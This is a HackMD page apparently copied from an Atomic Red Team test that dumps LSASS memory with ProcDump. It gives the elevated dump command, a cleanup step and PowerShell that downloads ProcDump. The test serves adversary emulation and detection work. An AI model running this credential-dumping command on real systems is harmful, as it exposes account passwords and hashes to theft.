HackMD - Collaborative Markdown Knowledge Base

## Atomic Test #1 - Dump LSASS.exe Memory using ProcDump The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first. **Supported Platforms:** Windows **auto_generated_guid:** 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8 #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where resulting dump should be placed | path | C:\Windows\Temp\lsass_dump.dmp| | procdump_exe | Path of Procdump executable | path | PathToAtomicsFolder\..\ExternalPayloads\procdump.exe| #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd "#{procdump_exe}" -accepteula -ma lsass.exe #{output_file} ``` #### Cleanup Commands: ```cmd del "#{output_file}" >nul 2> nul ``` #### Dependencies: Run with `powershell`! ##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) ##### Check Prereq Commands: ```powershell if (Test-Path "#{procdump_exe}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" "PathToAtomicsFolder\..\ExternalPayloads\Procdump" -Force New-Item -ItemType Directory (Split-Path "#{procdump_exe}") -Force | Out-Null Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe" "#{procdump_exe}" -Force ``` <br/> <br/>